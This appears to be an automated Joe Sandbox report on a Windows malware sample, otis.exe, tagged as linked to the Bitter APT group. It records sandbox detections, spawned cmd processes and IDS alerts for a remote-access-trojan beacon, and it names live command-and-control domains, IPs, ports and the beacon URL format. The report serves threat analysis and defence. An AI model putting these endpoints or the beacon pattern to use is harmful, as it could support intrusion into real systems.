Edit tour

Windows Analysis Report
otis.exe

Overview

General Information

Sample name:	otis.exe
Analysis ID:	1554908
MD5:	3d922c89c5f0f8f9a738bec3a24d0494
SHA1:	d5b0ad895d5adbf919ed6771292410df924fdd00
SHA256:	cb7e6640ab5c1dad5083e5790d6009c317894406b970d42a34758e99a9ff7f94
Tags:	aptBitterexeuser-smica83
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

otis.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\otis.exe" MD5: 3D922C89C5F0F8F9A738BEC3A24D0494)

cmd.exe (PID: 600 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1308 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5164 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6024 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2284 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2652 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6584 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1904 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7152 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3804 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3512 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4948 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T08:05:15.387383+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49730	TCP
2024-11-13T08:05:53.447362+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49758	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T08:05:30.239490+0100	2803305	3	Unknown Traffic	192.168.2.4	49738	91.132.92.231	9314	TCP
2024-11-13T08:05:32.223185+0100	2803305	3	Unknown Traffic	192.168.2.4	49740	91.132.92.231	9314	TCP
2024-11-13T08:05:34.237402+0100	2803305	3	Unknown Traffic	192.168.2.4	49742	91.132.92.231	9314	TCP
2024-11-13T08:05:36.165379+0100	2803305	3	Unknown Traffic	192.168.2.4	49744	91.132.92.231	9314	TCP
2024-11-13T08:05:38.174755+0100	2803305	3	Unknown Traffic	192.168.2.4	49746	91.132.92.231	9314	TCP
2024-11-13T08:05:44.133604+0100	2803305	3	Unknown Traffic	192.168.2.4	49748	91.132.92.231	9314	TCP
2024-11-13T08:05:46.204734+0100	2803305	3	Unknown Traffic	192.168.2.4	49750	91.132.92.231	9314	TCP
2024-11-13T08:05:48.151428+0100	2803305	3	Unknown Traffic	192.168.2.4	49752	91.132.92.231	9314	TCP
2024-11-13T08:05:50.100520+0100	2803305	3	Unknown Traffic	192.168.2.4	49754	91.132.92.231	9314	TCP
2024-11-13T08:05:52.051668+0100	2803305	3	Unknown Traffic	192.168.2.4	49756	91.132.92.231	9314	TCP
2024-11-13T08:05:54.029257+0100	2803305	3	Unknown Traffic	192.168.2.4	49759	91.132.92.231	9314	TCP

ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T08:05:28.419802+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49737	192.121.170.106	6969	TCP
2024-11-13T08:05:30.395781+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49739	192.121.170.106	6969	TCP
2024-11-13T08:05:32.383336+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49741	192.121.170.106	6969	TCP
2024-11-13T08:05:34.302832+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49743	192.121.170.106	6969	TCP
2024-11-13T08:05:36.306609+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49745	192.121.170.106	6969	TCP
2024-11-13T08:05:38.282732+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49747	192.121.170.106	6969	TCP
2024-11-13T08:05:44.301388+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49749	192.121.170.106	6969	TCP
2024-11-13T08:05:46.335595+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49751	192.121.170.106	6969	TCP
2024-11-13T08:05:48.251740+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49753	192.121.170.106	6969	TCP
2024-11-13T08:05:50.227877+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49755	192.121.170.106	6969	TCP
2024-11-13T08:05:52.194039+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49757	192.121.170.106	6969	TCP
2024-11-13T08:05:58.423770+0100	2811176	1	Malware Command and Control Activity Detected	192.168.2.4	49766	192.121.170.106	6969	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: otis.exe	ReversingLabs: Detection: 42%
Source: otis.exe	Virustotal: Detection: 52%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 92.3% probability

Source: otis.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49745 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49737 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49766 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49747 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49757 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49743 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49751 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49753 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49755 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49741 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49749 -> 192.121.170.106:6969
Source: Network traffic	Suricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49739 -> 192.121.170.106:6969

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49759

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 91.132.92.231:9314

Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314

Source: Joe Sandbox View

ASN Name: EDIS-AS-EUAT EDIS-AS-EUAT

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 91.132.92.231:9314
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730

Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.170.106

Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global traffic	HTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314

Source: global traffic

DNS traffic detected: DNS query: federalrevenueboard.com

Source: otis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000107000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000AF000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://federalrevenueboard.com
Source: otis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F9000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000270000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://federalrevenueboard.com:9314
Source: otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5
Source: otis.exe, 00000000.00000002.4126891226.0000021000001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5P
Source: otis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F3000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5h
Source: otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://federalrevenueboard.com:93142
Source: otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\otis.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\otis.exe	Code function: 0_2_00007FFD9B8B3BFD	0_2_00007FFD9B8B3BFD
Source: C:\Users\user\Desktop\otis.exe	Code function: 0_2_00007FFD9B8B3268	0_2_00007FFD9B8B3268
Source: C:\Users\user\Desktop\otis.exe	Code function: 0_2_00007FFD9B8A3078	0_2_00007FFD9B8A3078

Source: classification engine

Classification label: mal64.troj.winEXE@37/0@1/2

Source: C:\Users\user\Desktop\otis.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:708:120:WilError_03

Source: otis.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: otis.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\otis.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: otis.exe	ReversingLabs: Detection: 42%
Source: otis.exe	Virustotal: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\otis.exe "C:\Users\user\Desktop\otis.exe"
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
